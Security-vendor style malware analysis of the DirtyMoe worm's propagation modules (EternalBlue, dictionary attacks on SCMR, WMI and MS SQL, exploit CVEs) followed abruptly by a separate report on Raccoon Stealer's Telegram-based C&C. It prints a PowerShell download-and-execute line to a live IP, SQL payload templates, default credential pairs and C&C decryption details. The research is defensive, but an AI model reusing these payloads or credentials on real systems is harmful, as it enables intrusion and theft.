One of the main vulnerabilities is CVE:2017-0144: EternalBlue SMB Remote Code Execution (patched by Microsoft in MS17-010). It is bewildering how many EternalBlue attacks are still observed – Avast is still blocking approximately 20 million EternalBlue attack attempts every month.
The worming module focuses on Windows versions from Windows XP to Windows 8. We have identified that the EternalBlue implementation is the same as described in exploit-db [3], and the effective payload including the @RCE@ command is identical to DoublePulsar [4]. Interestingly, the whole EternalBlue payload is hardcoded for each Windows architecture, although the payload could be composed for each platform separately.
5.2 Service Control Manager Remote Protocol
No known vulnerability is used in the case of Service Control Manager Remote Protocol (SCMR) [5]. The worming module attacks SCMR through a dictionary attack. The first phase is to guess an administrator password. The details of the dictionary attack are described in Section 6.4.
If the dictionary attack is successful and the module guesses the password, a new Windows service is created and started remotely via RPC over the SMB service. Figure 5 illustrates the network communication of the attack. Binding to SCMR is identified using the UUID {367ABB81-9844-35F1-AD32-98F038001003}. The worming module, acting as a client, writes commands to the \PIPE\svcctl pipe on the server side. The first batch of commands creates a new service and registers a command with the malicious @RCE@ payload. The new service is started and is then deleted to attempt to cover its tracks.
The Microsoft HTML Application Host (mshta.exe) is used as a LOLBin to create a ShellWindows object and run @RCE@. The advantage of this proxy execution is that mshta.exe is typically marked as trusted; some defenders may not detect this misuse of mshta.exe.
The Windows Event Log records these suspicious events in the System log, as shown in Figure 6. The service name is in the form AC<number>, and the number is incremented for each successful attack. It is also worth noting that ImagePath contains the @RCE@ command sent to SCMR in BinaryPathName; see Figure 5.
5.3 Windows Management Instrumentation
The second method that does not misuse any known vulnerability is a dictionary attack to Windows Management Instrumentation (WMI). The workflow is similar to the SCMR attack. Firstly, the worming module must also guess the password of a victim administrator account. The details of the dictionary attack are described in Section 6.4.
The attackers can use WMI to manage and access data and resources on remote computers [6]. If they have an account with administrator privileges, full access to all system resources is available remotely.
The malicious misuse lies in the creation of a new process that runs @RCE@ via a WMI script; see Figure 7. DirtyMoe is then installed in the following six steps:
Initialize the COM library.
Connect to the default namespace root/cimv2 containing the WMI classes for management.
The Win32_Process class is created, and @RCE@ is set up as a command-line argument.
Win32_ProcessStartup represents the startup configuration of the new process. The worming module sets the process window to a hidden state, so the execution is completely silent.
The new process is started, and the DirtyMoe installer is run.
Finally, the WMI script is finished, and the COM library is cleaned up.
5.4 Microsoft SQL Server
Attacks on Microsoft SQL Servers are the second most widespread attack performed by the worming modules. The targeted MS SQL Server versions are 2000, 2005, 2008, 2012, 2014, 2016, 2017, and 2019.
The worming module also does not abuse any vulnerability related to MS SQL. However, it uses a combination of the dictionary attack and MS15-076: “RCE Allow Elevation of Privilege” known as “Hot Potato Windows Privilege Escalation”. Additionally, the malware authors utilize the MS15-076 implementation known as Tater, the PowerSploit function Invoke-ReflectivePEInjection, and CVE-2019-1458: “WizardOpium Local Privilege Escalation” exploit.
The first stage of the MS SQL attack is to guess the password of an attacked MS SQL server. The first batch of username/password pairs is hardcoded. The malware authors have collected the hardcoded credentials from publicly available sources. It contains fifteen default passwords for a few databases and systems like Nette Database, Oracle, Firebird, Kingdee KIS, etc. The complete hardcoded credentials are as follows: 401hk/401hk_@_, admin/admin, bizbox/bizbox, bwsa/bw99588399, hbv7/zXJl@mwZ, kisadmin/ypbwkfyjhyhgzj, neterp/neterp, ps/740316, root/root, sp/sp, su/t00r_@_, sysdba/masterkey, uep/U_tywg_2008, unierp/unierp, vice/vice.
If the first batch is not successful, the worming module attacks using the hardcoded dictionary. The detailed workflow of the dictionary attack is described in Section 6.4.
If the module successfully guesses the username/password of the attacked MS SQL server, the module executes corresponding payloads based on the Transact-SQL procedures. There are five methods launched one after another.
sp_start_job The module creates, schedules, and immediately runs a task with Payload 1.
sp_makewebtask The module creates a task that produces an HTML document containing Payload 2.
sp_OAMethod The module creates an OLE object using the VBScript "WScript.Shell" and runs Payload 3.
xp_cmdshell This method spawns a Windows command shell and passes in a string for execution represented by Payload 3.
Run-time Environment Payload 4 is executed as a .NET assembly.
In brief, there are four payloads used for the DirtyMoe installation. The SQL worming module defines a placeholder @SQLEXEC@ representing the full URL to the MSI installation package located on the C&C server. If any of the payloads successfully performs a privilege escalation, the DirtyMoe installation is silently launched via the MSI installer; see our DirtyMoe Deployment blog post for more details.
Payload 1
The first payload tries to run the following PowerShell command: powershell -nop -exec bypass -c "IEX $decoded; MsiMake @SQLEXEC@;" where $decoded contains the MsiMake function, as illustrated in Figure 8. The function calls the MsiInstallProduct function from msi.dll as a completely silent installation (INSTALLUILEVEL_NONE), but only if the MS SQL server runs under administrator privileges.
Payload 2
The second payload is used only for sp_makewebtask execution; the payload is written to the following autostart folders: C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\1.hta C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\1.hta
Figure 9 illustrates the content of the 1.hta file camouflaged as an HTML file. It is evident that DirtyMoe may be installed on each Windows startup.
Payload 3
The third payload is more sophisticated since it targets the vulnerabilities and exploits mentioned above. Firstly, the worming module prepares a @SQLPSHELL@ placeholder containing a full URL to the DirtyMoe object that is the adapted version of the Tater PowerShell script.
The first stage of the payload is a powershell command: powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString(''@SQLPSHELL@''); MsiMake @SQLEXEC@"
The adapted Tater script implements the extended MsiMake function. The script attempts to install DirtyMoe using three different ways:
Install DirtyMoe via the MsiMake implementation captured in Figure 8.
Attempt to exploit the system using Invoke-ReflectivePEInjection with the following arguments: Invoke-ReflectivePEInjection -PEBytes $Bytes -ExeArgs $@RCE@ -ForceASLR where $Bytes is the implementation of CVE-2019-1458 that is included in the script.
The last way is installation via the Tater command: Invoke-Tater -Command $@RCE@
The example of Payload 3 is: powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://108.61.184.105:20114/57BC9B7E.Png'); MsiMake http://108.61.184.105:20114/0CFA042F.Png"
Payload 4
The attackers use .NET to provide a run-time environment that executes an arbitrary command under the MS SQL environment. The worming module defines a new assembly .NET procedure using Common Language Runtime (CLR), as Figure 10 demonstrates.
The .NET code of Payload 4 is a simple class defining a SQL procedure ExecCommand that runs a malicious command using the Process class; shown in Figure 11.
5.5 Development Module
We have discovered one worming module containing artifacts that indicate that the module is in development. This module does not appear to be widespread in the wild, and it may give insight into the malware authors’ future intentions. The module contains many hard-coded sections in different states of development; some sections do not hint at the @RCE@ execution.
ThinkPHP
CVE:2019-9082: ThinkPHP – Multiple PHP Injection RCEs
The module uses the exact implementation published at [7]; see Figure 12. In short, a CGI script that verifies the availability of call_user_func_array is sent. If the verification passes, the CGI script is re-sent with @RCE@.
Deserialization
CVE:2018-0147: Deserialization Vulnerability
The current module implementation executes a malicious Java class [8], shown in Figure 13, on an attacked server. The RunCheckConfig class is an executioner for accepted connections that include a malicious serializable object.
The module prepares the serializable object illustrated in Figure 14 that the RunCheckConfig class runs when the server accepts this object through the HTTP POST method.
The implementation that delivers the RunCheckConfig class into the attacked server abuses the same vulnerability. It prepares a serializable object executing ObjectOutputStream, which writes the RunCheckConfig class into c:/windows/tmp. However, this implementation is not included in this module, so we assume that this module is still in development.
Oracle Weblogic Server
CVE:2019-2725: Oracle Weblogic Server - 'AsyncResponseService' Deserialization RCE
The module again exploits vulnerabilities published at [9] to send malicious SOAP payloads without any authentication to the Oracle Weblogic Server T3 interface, followed by sending additional SOAP payloads to the WLS AsyncResponseService interface.
SOAP The SOAP request defines the WorkContext as java.lang.Runtime with three arguments. The first argument defines which executable should be run. The following arguments determine parameters for the executable. An example of the WorkContext is shown in Figure 15.
Hardcoded SOAP commands are not related to @RCE@; we assume that this implementation is also in development.
6. Worming Module Execution
The worming module is managed by the DirtyMoe service, which controls its configuration, initialization, and worming execution. This section describes the lifecycle of the worming module.
6.1 Configuration
The DirtyMoe service contacts one of the C&C servers and downloads an appropriate worming module into a Shim Database (SDB) file located at %windir%\apppatch\TK<volume-id>MS.sdb. The worming module is then decrypted and injected into a new svchost.exe process, as Figure 2 illustrates.
The encrypted module is a PE executable that contains additional placeholders. The DirtyMoe service passes configuration parameters to the module via these placeholders. This approach is identical to other DirtyMoe modules; however, some of the placeholders are not used in the case of the worming module.
The placeholders overview is as follows:
@TaskGuid@: N/A in worming module
@IPsSign@: N/A in worming module
@RunSign@: Mutex created by the worming module that is controlled by the DirtyMoe service
@GadSign@: ID of DirtyMoe instance registered in C&C
@FixSign@: Type of worming module, e.g., ScanSmbHs5
@InfSign@: Worming module configuration
6.2 Initialization
When the worming module, represented by the new process, is injected and resumed by the DirtyMoe service, the module initialization is invoked. Firstly, the module unpacks a word dictionary containing passwords for a dictionary attack. The dictionary consists of 100,000 commonly used passwords compressed using LZMA. Secondly, internal structures are established as follows:
IP Address Backlog The module stores discovered IP addresses with open ports of interest. It saves the IP address and the timestamp of the last port check.
Dayspan and Hourspan Lists These lists manage IP addresses and their insertion timestamps used for the dictionary attack. The IP addresses are picked up based on a threshold value defined in the configuration. The IP will be processed if the IP address timestamp surpasses the threshold value of the day or hour span. If, for example, the threshold is set to 1, then if a day/hour span of the current date and a timestamp is greater than 1, a corresponding IP will be processed. The Dayspan list registers IPs generated by Class B from IP Table, Fully Random IP, and Derived Classes A methods; in other words, IPs that are further away from the worming module location. On the other hand, the Hourspan list records IPs located closer.
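Under our reading of the threshold semantics above, the day/hour-span test can be sketched as follows; the function name and exact comparison are assumptions for illustration.

```python
from datetime import datetime, timedelta

def should_process(inserted: datetime, now: datetime,
                   threshold: int, span: str) -> bool:
    """An IP is processed once the day/hour span between now and its
    insertion timestamp exceeds the configured threshold (HX)."""
    unit = timedelta(days=1) if span == "day" else timedelta(hours=1)
    return (now - inserted) / unit > threshold

now = datetime(2022, 3, 2, 12, 0)
# Inserted 1.5 days ago, threshold 1 day -> due for processing.
due = should_process(datetime(2022, 3, 1, 0, 0), now, threshold=1, span="day")
```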
Thirdly, the module reads its configuration described by the @InfSign@ placeholder. The configuration matches this pattern: <IP>|<PNG_ID>|<timeout>|[SMB:HX:PX1.X2.X3:AX:RX:BX:CX:DX:NX:SMB]
IP is the number representing the machine IP from which the attack will be carried out. The IP is input for the methods generating IPs; see Section 4. If the IP is not available, the default address 98.126.89.1 is used.
PNG_ID is the number used to derive the hash name that mirrors the DirtyMoe object name (MSI installer package) stored at the C&C. The hash name is generated using the MS_RPC_<n> string, where n is PNG_ID; see Section 3.
Timeout is the default timeout for connections to the attacked services in seconds.
HX is a threshold for comparing IP timestamps stored in the Dayspan and Hourspan lists. The comparison ascertains whether an IP address will be processed if the timestamp of the IP address exceeds the day/hour threshold.
P is the flag for the dictionary attack.
X1 number determines how many initial passwords will be used from the password dictionary to increase the probability of success – the dictionary contains the most used passwords at the beginning.
X2 number is used for the second stage of the dictionary attack if the first X1 passwords are unsuccessful. Then the worming module tries to select X2 passwords from the dictionary randomly.
X3 number defines how many threads will process the Dayspan and Hourspan lists; more precisely, how many threads will attack the registered IP addresses in the Dayspan/Hourspan lists.
AX: how many threads will generate IP addresses using Class B from IP Table methods.
The typical configuration can be 217.xxx.xxx.xxx|5|2|[SMB:H1:P1.30.3:A10:R3:B3:C3:D1:N3:SMB]
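The configuration fields described above can be pulled apart with a small parser. This is a hypothetical sketch: the pattern follows the @InfSign@ layout from Section 6.2, the field names and the placeholder IP in the example are our own.

```python
import re

# Pattern: <IP>|<PNG_ID>|<timeout>|[SMB:HX:PX1.X2.X3:AX:RX:BX:CX:DX:NX:SMB]
CONF_RE = re.compile(
    r"(?P<ip>[^|]+)\|(?P<png_id>\d+)\|(?P<timeout>\d+)\|"
    r"\[SMB:H(?P<h>\d+):P(?P<x1>\d+)\.(?P<x2>\d+)\.(?P<x3>\d+)"
    r":A(?P<a>\d+):R(?P<r>\d+):B(?P<b>\d+):C(?P<c>\d+):D(?P<d>\d+):N(?P<n>\d+):SMB\]"
)

def parse_config(raw: str) -> dict:
    """Split an @InfSign@ string into its named fields."""
    m = CONF_RE.fullmatch(raw)
    if m is None:
        raise ValueError("unrecognized worming configuration")
    return m.groupdict()

# Placeholder IP; the observed sample redacts the real module address.
cfg = parse_config("217.0.0.1|5|2|[SMB:H1:P1.30.3:A10:R3:B3:C3:D1:N3:SMB]")
```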
Finally, the worming module starts all threads defined by the configuration, and the worming process and attacks are started.
6.3 Worming
The worming process has five phases run, more or less, in parallel. Figure 16 has an animation of the worming process.
Phase 1
The worming module usually starts 23 threads generating IP addresses using the methods described in Section 4. The IP addresses are classified into two groups: day-span and hour-span.
Phase 2
The second phase runs in parallel with the first; its goal is to test generated IPs. Each specific module targets defined ports that are verified via sending a zero-length transport datagram. If the port is active and ready to receive data, the IP address of the active port is added to IP Address Backlog. Additionally, the SMB worming module immediately tries the EternalBlue attack within the port scan.
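The liveness check can be approximated as below. Note the module reportedly probes with a zero-length transport datagram; this sketch substitutes a plain TCP connect with a short timeout, which is functionally similar for deciding whether a port accepts data.

```python
import socket

def port_is_live(ip: str, port: int, timeout: float = 2.0) -> bool:
    """Return True if a TCP connection to (ip, port) succeeds within
    the timeout; live endpoints would be added to the IP Address Backlog."""
    try:
        with socket.create_connection((ip, port), timeout=timeout):
            return True
    except OSError:
        return False
```

In the real module, a successful SMB probe additionally triggers an immediate EternalBlue attempt as part of the same scan.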
Phase 3
The IP addresses verified in Phase 2 are also registered into the Dayspan and Hourspan lists. The module keeps only 100 items (IP addresses), and the lists are implemented as a queue. Therefore, some IPs can be removed from these lists if the IP address generation is too fast or the dictionary attacks are too slow. However, the removed addresses are still present in the IP Address Backlog.
Phase 4
The threads created based on the X3 configuration parameters process and manage the items (IPs) of Dayspan and Hourspan lists. Each thread picks up an item from the corresponding list, and if the defined day/hour threshold (HX parameter) is exceeded, the module starts the dictionary attack to the picked-up IP address.
Phase 5
Each generated and verified IP is associated with a timestamp of creation. The last phase is activated if the newest timestamp is older than 10 minutes, i.e., if the IP generation is suspended for any reason and no new IPs arrive within 10 minutes. Then, one dedicated thread extracts IPs from the backlog and processes them from the beginning; these IPs are processed as per Phase 2, and the whole worming process continues.
6.4 Dictionary Attack
The dictionary attack targets two administrator user names, namely administrator for SMB services and sa for MS SQL servers. If the attack is successful, the worming module infiltrates a targeted system utilizing an attack series composed of techniques described in Section 5:
Service Control Manager Remote Protocol (SCMR)
Windows Management Instrumentation (WMI)
Microsoft SQL Server (SQL)
The first attack attempt is sent with an empty password. The module then addresses three states based on the attack response as follows:
No connection: the connection was not established, although a targeted port is open – a targeted service is not available on this port.
Unsuccessful: the targeted service/system is available, but authentication failed due to an incorrect username or password.
Success: the targeted service/system uses the empty password.
Administrator account has an empty password
If the administrator account is not protected, the whole worming process occurs quickly (this is the best possible outcome from the attacker’s point of view). The worming module then proceeds to infiltrate the targeted system with the attack series (SCMR, WMI, SQL) by sending the empty password.
Bad username or authentication information
A more complex situation occurs if the targeted services are active, and it is necessary to attack the system by applying the password dictionary.
Cleverly, the module stores all previously successful passwords in the system registry; the first phase of the dictionary attack iterates through all stored passwords and uses these to attack the targeted system. Then, the attack series (SCMR, WMI, SQL) is started if the password is successfully guessed.
The second phase occurs if the stored registry passwords yield no success. The module then attempts authentication using a defined number of initial passwords from the password dictionary; this number is specified by the X1 configuration parameter (usually X1*100). If this phase is successful, the guessed password is stored in the system registry, and the attack series is initiated.
The final phase follows if the second phase is not successful. The module randomly chooses a password from a dictionary subset X2*100 times. The subset is defined as the original dictionary minus the first X1*100 items. In case of success, the attack series is invoked, and the password is added to the system registry.
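The three phases above amount to an ordered candidate stream. The sketch below reflects our reading of the X1/X2 semantics (registry passwords first, then the first X1*100 dictionary entries, then X2*100 random picks from the remainder); the function and sample data are illustrative only.

```python
import random

def candidate_passwords(registry, dictionary, x1, x2, rng=random.Random()):
    """Yield password guesses in the order the module tries them."""
    yield from registry                    # phase 1: previously successful
    head = dictionary[: x1 * 100]
    yield from head                        # phase 2: most common passwords
    tail = dictionary[x1 * 100:]
    for _ in range(x2 * 100):              # phase 3: random from the rest
        yield rng.choice(tail)

dictionary = [f"pw{i}" for i in range(10_000)]
cands = list(candidate_passwords(["hunter2"], dictionary, x1=1, x2=3))
```

Ordering the dictionary by popularity makes phase 2 cheap and effective, which is why the module only falls back to random sampling when the common passwords fail.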
Successfully used passwords are stored encrypted, in the following system registry location: HKEY_LOCAL_MACHINE\Software\Microsoft\DirectPlay8\Direct3D\RegRunInfo-BarkIPsInfo
7. Summary and Discussion
Modules
We have detected three versions of the DirtyMoe worming module in use. Two versions specifically focus on the SMB service and MS SQL servers. However, the third contains several artifacts implying other attack vectors targeting PHP, Java Deserialization, and Oracle Weblogic Server. We continue to monitor and track these activities.
Attacked Machines
One interesting finding is the attack adaptation based on the geographical location of the worming module. The methods described in Section 4 try to distribute the generated IP addresses evenly to cover the largest possible radius. This is achieved using the IP address of the worming module itself, since half of the threads generating victims’ IPs are based on the module’s IP address. Otherwise, if the IP is not available for some reason, the IP address 98.126.89.1, located in Los Angeles, is used as the base address.
We performed a few VPN experiments for the following locations: the United States, Russian Federation, Czech Republic, and Taiwan. The results are animated in Figure 17; Table 1 records the attack distributions for each tested VPN.
VPN
Attack Distribution
Top countries
United States
North America (59%) Europe (21%) Asia (16%)
United States
Russian Federation
North America (41%) Europe (33%) Asia (20%)
United States, Iran, United Kingdom, France, Russian Federation
Czech Republic
Europe (56%) Asia (14%) South America (11%)
China, Brazil, Egypt, United States, Germany
Taiwan
North America (47%) Europe (22%) Asia (18%)
United States, United Kingdom, Japan, Brazil, Turkey
Table 1. VPN attack distributions and top countries
LAN
Perhaps the most striking discovery was the observed lateral movement in local networks. The module keeps all successfully guessed passwords in the system registry; these saved passwords increase the probability of password guessing in local networks, particularly in home and small business networks. Therefore, if machines in a local network use the same weak passwords that can be easily guessed, the module can quickly infiltrate the local network.
Exploits
All abused exploits are from publicly available resources. We have identified six main vulnerabilities summarized in Table 2. The worming module adopts the exact implementation of EternalBlue, ThinkPHP, and Oracle Weblogic Server exploits from exploit-db. In the same way, the module applies and modifies implementations of DoublePulsar, Tater, and PowerSploit frameworks.
ID
Description
CVE:2019-9082
ThinkPHP – Multiple PHP Injection RCEs
CVE:2019-2725
Oracle Weblogic Server – ‘AsyncResponseService’ Deserialization RCE
CVE:2019-1458
WizardOpium Local Privilege Escalation
CVE:2018-0147
Deserialization Vulnerability
CVE:2017-0144
EternalBlue SMB Remote Code Execution (MS17-010)
MS15-076
RCE Allow Elevation of Privilege (Hot Potato Windows Privilege Escalation)
Table 2. Used exploits
C&C Servers
The C&C servers determine which module will be deployed on a victim machine. The mechanism of the worming module selection depends on client information additionally sent to the C&C servers. However, details of how this module selection works remain to be discovered.
Password Dictionary
The password dictionary is a collection of the most commonly used passwords obtained from the internet. The dictionary size is 100,000 words and numbers across several topics and languages. There are several language mutations for the top world languages, e.g., English, Spanish, Portuguese, German, French, etc. (passwort, heslo, haslo, lozinka, parool, wachtwoord, jelszo, contrasena, motdepasse). Other topics are cars (volkswagen, fiat, hyundai, bugatti, ford) and art (davinci, vermeer, munch, michelangelo, vangogh). The dictionary also includes dirty words and some curious names of historical personalities like hitler, stalin, lenin, hussein, churchill, putin, etc.
The dictionary is used for the SCMR, WMI, and SQL attacks. The SQL module, however, additionally hard-codes another 15 username/password pairs, also collected from the internet. The SQL passwords are usually default passwords of well-known systems.
Worming Workflow
The modules also implement a technique for repeated attacks on machines with ‘live’ targeted ports, even when the first attack was unsuccessful. The attacks can be scheduled hourly or daily based on the worm configuration. This approach can prevent a firewall from blocking an attacking machine and reduce the risk of detection.
Another essential attribute is the closing of TCP port 445 following a successful exploit of a targeted system. This way, compromised machines are “protected” from other malware that abuses the same vulnerabilities. The MSI installer also includes a mechanism that prevents DirtyMoe from overwriting itself, so that the configuration and already downloaded modules are preserved.
IP Generation Performance
The primary key to this worm’s success is the performance of the IP generator. We have used empirical measurement to determine the performance of the worming module. This measurement indicates that one module instance can generate and attack 1,500 IPs per second on average. However, one of the tested instances could generate up to 6,000 IPs/sec, so one instance can try two million IPs per day.
The evidence suggests that approximately 1,900 instances can generate the whole IPv4 range in one day; our detections estimate more than 7,000 active instances exist in the wild. In theory, the effect is that DirtyMoe can generate and potentially target the entire IPv4 range three times a day.
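A back-of-the-envelope check of these figures, using plain arithmetic on the numbers quoted above:

```python
# Sanity check of the coverage estimate quoted above.
IPV4_SPACE = 2 ** 32              # 4,294,967,296 addresses
INSTANCES_FOR_FULL_SWEEP = 1_900  # instances needed to cover IPv4 in a day
ACTIVE_INSTANCES = 7_000          # instances estimated active in the wild

# ~1,900 instances covering the space in a day implies each instance
# tries roughly two million IPs per day, matching the figure above.
per_instance_per_day = IPV4_SPACE / INSTANCES_FOR_FULL_SWEEP
print(f"{per_instance_per_day:,.0f} IPs/day per instance")

# With ~7,000 active instances, the whole range can in theory be
# swept several times a day.
sweeps_per_day = ACTIVE_INSTANCES / INSTANCES_FOR_FULL_SWEEP
print(f"{sweeps_per_day:.1f} sweeps/day")
```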
8. Conclusion
The primary goal of this research was to analyze one of the DirtyMoe module groups, which spreads the DirtyMoe malware using worming techniques. The second aim of this study was to investigate the effects of worming and determine which exploits are in use.
In most cases, DirtyMoe is deployed using external exploit kits like PurpleFox or injected installers of Telegram Messenger, which require user interaction for successful infiltration. Importantly, worming is controlled by the C&C and executed by active DirtyMoe instances, so no user interaction is required.
Worming target IPs are generated using a cleverly designed algorithm that evenly generates IP addresses across the world and in relation to the geographical location of the worming module. Moreover, the module targets local/home networks. Because of this, public IPs and even private networks behind firewalls are at risk.
Victims’ active machines are attacked using the EternalBlue exploit and dictionary attacks aimed at SCMR, WMI, and MS SQL services with weak passwords. In total, we detected six vulnerabilities abused by the worming module, all implemented from publicly disclosed exploits.
We also discovered one worming module in development that contains implementations of exploits for other vulnerabilities; it did not appear fully armed for deployment. However, there is a chance that these tested exploits are already implemented and spreading in the wild.
Based on the number of active DirtyMoe instances, it can be argued that worming can threaten hundreds of thousands of computers per day. Furthermore, new vulnerabilities, such as Log4j, provide a tremendous and powerful opportunity to implement a new worming module. With this in mind, our researchers continue to monitor the worming activities and hunt for other worming modules.
IOCs
CVE-2019-1458: “WizardOpium” Local Privilege Escalation
fef7b5df28973ecf8e8ceffa8777498a36f3a7ca1b4720b23d0df18c53628c40
We recently came across a stealer called Raccoon Stealer, a name given to it by its author. Raccoon Stealer uses the Telegram infrastructure to store and update actual C&C addresses.
Raccoon Stealer is a password stealer capable of stealing not just passwords, but various types of data, including:
Cookies, saved logins and forms data from browsers
Login credentials from email clients and messengers
Files from crypto wallets
Data from browser plugins and extensions
Arbitrary files based on commands from C&C
In addition, it’s able to download and execute arbitrary files by command from its C&C. In combination with active development and promotion on underground forums, Raccoon Stealer is prevalent and dangerous.
The oldest samples of Raccoon Stealer we’ve seen have timestamps from the end of April 2019. Its authors have stated the same month as the start of selling the malware on underground forums. Since then, it has been updated many times. According to its authors, they fixed bugs, added features, and more.
Distribution
We’ve seen Raccoon distributed via downloaders such as Buer Loader and GCleaner. Based on some samples, we believe it is also being distributed in the form of fake game cheats, patches for cracked software (including hacks and mods for Fortnite, Valorant, and NBA 2K22), or other software. Taking into account that Raccoon Stealer is for sale, its distribution techniques are limited only by the imagination of the end buyers. Some samples are spread unpacked, while others are protected using Themida or malware packers. Worth noting is that some samples were packed more than five times in a row with the same packer!
Technical details
Raccoon Stealer is written in C/C++ and built using Visual Studio. Samples are about 580–600 kB in size. The code quality is below average; some strings are encrypted, others are not.
Once executed, Raccoon Stealer checks the default user locale set on the infected device and won’t work if it’s one of the following:
Russian
Ukrainian
Belarusian
Kazakh
Kyrgyz
Armenian
Tajik
Uzbek
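The locale gate boils down to a simple membership check. Here is a minimal illustrative sketch (the language tags are ours for illustration; the actual sample queries the Windows default user locale via the Win32 API):

```python
# Illustrative sketch of Raccoon Stealer's locale gate (not actual malware
# code): execution stops when the default locale matches the exclusion list.
EXCLUDED_LANGS = {
    "ru",  # Russian
    "uk",  # Ukrainian
    "be",  # Belarusian
    "kk",  # Kazakh
    "ky",  # Kyrgyz
    "hy",  # Armenian
    "tg",  # Tajik
    "uz",  # Uzbek
}

def should_run(locale_tag):
    """Return False for locales the stealer refuses to run under."""
    lang = locale_tag.lower().split("-")[0]
    return lang not in EXCLUDED_LANGS

print(should_run("ru-RU"))  # False
print(should_run("en-US"))  # True
```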
C&C communications
The most interesting thing about this stealer is its communication with C&Cs. There are four values crucial for its C&C communication, which are hardcoded in every Raccoon Stealer sample:
MAIN_KEY – this value has been changed four times over the course of a year
URLs of Telegram gates with a channel name – gates are used so that samples neither have to implement the complicated Telegram protocol nor store any credentials
BotID – a hexadecimal string sent to the C&C every time
TELEGRAM_KEY – a key used to decrypt the C&C address obtained from the Telegram gate
Let’s look at an example to see how it works, using the sample 447c03cc63a420c07875132d35ef027adec98e7bd446cf4f7c9d45b6af40ea2b, which unpacks to f1cfcce14739887cc7c082d44316e955841e4559ba62415e1d2c9ed57d0c6232:
First of all, MAIN_KEY is decrypted. See the decryption code in the image below:
In this example, the MAIN_KEY is jY1aN3zZ2j. This key is used to decrypt Telegram Gates URLs and BotID.
Next, the Telegram gate URLs are decoded and decrypted. They are stored in the sample as: Rf66cjXWSDBo1vlrnxFnlmWs5Hi29V1kU8o8g8VtcKby7dXlgh1EIweq4Q9e3PZJl3bZKVJok2GgpA90j35LVd34QAiXtpeV2UZQS5VrcO7UWo0E1JOzwI0Zqrdk9jzEGQIEzdvSl5HWSzlFRuIjBmOLmgH/V84PCRFevc40ZuTAZUq+q1JywL+G/1xzXQdYZiKWea8ODgaN+4B8cT3AqbHmY5+6MHEBWTqTsITPAxKdPMu3dC9nwdBF3nlvmX4/q/gSPflYF7aIU1wFhZxViWq2 After Base64 decoding, the data has this form:
Decrypting this binary data with RC4 using MAIN_KEY gives us a string with Telegram Gates:
The stealer then has to obtain its real C&C. To do so, it requests a Telegram gate, which returns an HTML page:
Here you can see a Telegram channel name and its status in Base64: e74b2mD/ry6GYdwNuXl10SYoVBR7/tFgp2f-v32 The prefix (always five characters) and postfix (always six characters) are removed, leaving mD/ry6GYdwNuXl10SYoVBR7/tFgp The Base64 is then decoded to obtain an encrypted C&C URL:
The TELEGRAM_KEY in this sample is the string 739b4887457d3ffa7b811ce0d03315ce, and Raccoon uses it as the key for the RC4 algorithm to finally decrypt the C&C URL: http://91.219.236[.]18/
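The prefix/postfix stripping, Base64 decoding, and RC4 decryption described above can be reproduced with a short sketch. The RC4 routine below is a standard textbook implementation, not code lifted from the sample:

```python
import base64

def rc4(key, data):
    """Plain RC4 (KSA + PRGA); encryption and decryption are identical."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) % 256
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) % 256
        j = (j + S[i]) % 256
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) % 256])
    return bytes(out)

def extract_status(channel_status):
    """Drop the 5-char prefix and 6-char postfix around the Base64 payload."""
    return channel_status[5:-6]

def decrypt_c2(channel_status, telegram_key):
    """Recover the C&C address from a Telegram channel status string."""
    payload = base64.b64decode(extract_status(channel_status))
    return rc4(telegram_key.encode(), payload)

# The stripping step on the status string shown above:
status = "e74b2mD/ry6GYdwNuXl10SYoVBR7/tFgp2f-v32"
print(extract_status(status))  # mD/ry6GYdwNuXl10SYoVBR7/tFgp
```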
Raccoon builds a query string with PC information (machine GUID and user name) and the BotID.
The query string is encrypted with RC4 using the MAIN_KEY and then encoded with Base64.
This data is sent via POST to the C&C; the response is Base64-encoded and encrypted with the MAIN_KEY. Decoded, it is JSON with a lot of parameters and looks like this:
Thus, the Telegram infrastructure is used to store and update actual C&C addresses. It looks quite convenient and reliable until Telegram decides to take action.
Analysis
The people behind Raccoon Stealer
Based on our analysis of seller messages on underground forums, we can deduce some information about the people behind the malware. Raccoon Stealer was developed by a team, and some (or maybe all) of its members are native Russian speakers. Messages on the forum are written in Russian, and we assume they are from former USSR countries because they try to prevent the stealer from targeting users in these countries.
Possible names/nicknames of group members can be inferred from artifacts found in the samples:
C:\Users\a13xuiop1337\
C:\Users\David\
Prevalence
Raccoon Stealer is quite prevalent: from March 3, 2021 to February 17, 2022, our systems detected more than 25,000 Raccoon-related samples, and we identified more than 1,300 distinct configs during that period.
Here is a map showing the number of systems Avast protected from Raccoon Stealer from March 3, 2021 to February 17, 2022. In this time frame, Avast blocked nearly 600,000 Raccoon Stealer attacks.
The country where we blocked the most attempts is Russia, which is interesting because the actors behind the malware don’t want to infect computers in Russia or Central Asia. We believe the attackers spray and pray, distributing the malware around the world; it’s not until it makes it onto a system that it checks the default locale. If the locale is one of the languages listed above, the malware won’t run. This explains why we detected so many attack attempts in Russia: we block the malware before it can run, i.e. before it even gets to the stage where it checks the device’s locale. An unprotected device in Russia with its locale set to English, or any other language not on the exception list, would still become infected.
Telegram Channels
Among the more than 1,300 distinct configs we extracted, we found 429 unique Telegram channels. Some were used in only a single config; others were used dozens of times. The most used channels were:
jdiamond13 – 122 times
jjbadb0y – 44 times
nixsmasterbaks2 – 31 times
hellobyegain – 25 times
h_smurf1kman_1 – 24 times
Thus, the five most used channels appeared in about 19% of configs.
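The ~19% figure checks out against the counts above:

```python
# Share of configs using the five most popular Telegram channels.
top5 = {"jdiamond13": 122, "jjbadb0y": 44, "nixsmasterbaks2": 31,
        "hellobyegain": 25, "h_smurf1kman_1": 24}
total_configs = 1300
share = sum(top5.values()) / total_configs
print(f"{sum(top5.values())} configs, {share:.0%}")  # 246 configs, 19%
```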
Malware distributed by Raccoon
As previously mentioned, Raccoon Stealer is able to download and execute arbitrary files on command from the C&C. We managed to collect 185 of these files, with a total size of 265 MB; some of the groups are:
Downloaders – used to download and execute other files
Clipboard crypto stealers – change crypto wallet addresses in the clipboard – very popular (more than 10%)
WhiteBlackCrypt Ransomware
